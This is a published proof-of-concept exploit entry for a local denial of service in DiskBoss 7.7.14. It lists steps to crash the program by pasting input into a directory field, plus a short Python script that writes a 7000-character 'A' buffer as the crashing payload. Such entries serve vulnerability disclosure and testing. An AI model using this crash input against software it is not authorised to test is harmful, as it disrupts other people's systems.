Exploit DiskBoss 7.7.14 – DENIAL OF SERVICE (PoC)

 Exploit Title: DiskBoss 7.7.14 – Denial of Service (PoC)

 Date: 2020-04-01

 Exploit Author: Paras Bhatia

 Vendor Homepage: https://www.diskboss.com/

 Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe

 Vulnerable Software: DiskBoss

 Version: 7.7.14

 Vulnerability Type: Denial of Service (DoS) Local

 Tested on: Windows 7 Ultimate Service Pack 1 (32 bit – English)  

Steps to Produce the Crash:

   1.- Run python code: DiskbossCrash.py

   2.- Copy content to clipboard

   3.- Open “diskboss.exe” (diskbsg.exe)

   4.- Go to “Command” > Search Files

   5.- Click on second + icon (located at right side of “Search Disks, Directories and Network Shares”)

   6.- Click on ” Add Input Directory”

   7.- Paste ClipBoard into the “Directory” field

   8.- Click on OK

   9.- Crashed

Python “DiskbossCrash.py” Code:

buffer = “\x41” * 7000

f = open (“DiskbossCrash.txt”, “w”)

f.write(buffer)

f.close()